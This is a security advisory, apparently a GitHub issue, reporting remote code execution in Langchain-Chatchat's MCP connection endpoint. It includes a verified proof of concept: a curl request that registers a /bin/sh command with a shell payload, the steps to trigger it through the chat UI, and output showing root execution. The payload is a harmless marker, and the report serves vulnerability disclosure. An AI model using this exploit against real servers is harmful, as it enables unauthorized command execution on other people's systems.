Remote Code Execution via Malicious MCP Connection Registration #5428
Description
Vulnerability Report: Remote Code Execution via Malicious MCP Connection Registration
Vulnerability Type: Remote Code Execution (RCE)
Severity: Critical
Affected Component: MCP (Model Context Protocol) Connection Management & Chat Agent
Affected Files:
libs/chatchat-server/chatchat/server/api_server/mcp_routes.pylibs/chatchat-server/chatchat/server/chat/chat.pylibs/chatchat-server/langchain_chatchat/agents/platform_tools/base.pylibs/chatchat-server/langchain_chatchat/agent_toolkits/mcp_kit/client.py
Description
The Langchain-Chatchat application exposes an API endpoint /api/v1/mcp_connections/ that allows users to register and manage MCP (Model Context Protocol) connections. These connections define how the application interacts with external tools, including executing system commands via the stdio transport mechanism.
The application fails to sanitize or restrict the command, args, and env parameters provided during the creation of an MCP connection. Furthermore, these connections are stored in the database and automatically utilized by the chat agent when the use_mcp flag is set to True.
An attacker can register a malicious MCP connection with a crafted command (e.g., /bin/bash) and arguments (e.g., -c "malicious command"). Subsequently, simply triggering a chat completion request with use_mcp=True forces the application to search for enabled MCP connections and launch them as subprocesses, thereby executing the attacker's arbitrary code.
Root Cause
- Unrestricted Input: The
add_mcp_connectionfunction and its corresponding API endpoint accept arbitrary commands and arguments without validation. - Unsafe Execution: The
PlatformToolsRunnableclass (specificallycreate_mcp_client) iterates over enabled MCP connections and initiatesStdioConnectionclients, which execute the specified commands as subprocesses on the server. - Lack of Authorization/Availability: The API endpoint for adding connections might be exposed to low-privileged users, or the effect (RCE) can be triggered by any user who can invoke the chat interface.
Proof of Concept (PoC)
✅ VERIFIED - Successfully Exploited
The following demonstrates how to exploit this vulnerability:
Step 1: Register Malicious MCP Connection
curl -X POST "http://127.0.0.1:7861/api/v1/mcp_connections/" \
-H "Content-Type: application/json" \
-d '{
"server_name": "stealth_pwn",
"transport": "stdio",
"args": ["x", "-c", "(touch /tmp/STEALTH_RCE && echo STEALTH_SUCCESS > /tmp/STEALTH_RCE && id >> /tmp/STEALTH_RCE) &"],
"config": {"command": "/bin/sh"},
"enabled": true
}'Expected Response:
{"id":"6b6da7b99db843a993b8d17fe50187d0","server_name":"stealth_pwn","args":["x","-c","(touch /tmp/STEALTH_RCE && echo STEALTH_SUCCESS > /tmp/STEALTH_RCE && id >> /tmp/STEALTH_RCE) &"],"env":{},"cwd":null,"transport":"stdio","timeout":30,"enabled":true,"description":null,"config":{"command":"/bin/sh"},"create_time":"2025-12-22T10:07:42","update_time":"2025-12-22T10:07:42"}Step 2: Trigger Execution via WebUI
- Open the WebUI (e.g.,
http://127.0.0.1:8501) - Enable Agent mode and MCP option
- Send any message (e.g., "你好")
The malicious command executes during MCP client initialization, regardless of the message content.
Step 3: Verify RCE
# Check if the file was created with the malicious content
cat /tmp/STEALTH_RCEVerified Output:
STEALTH_SUCCESS
uid=0(root) gid=0(root) groups=0(root)
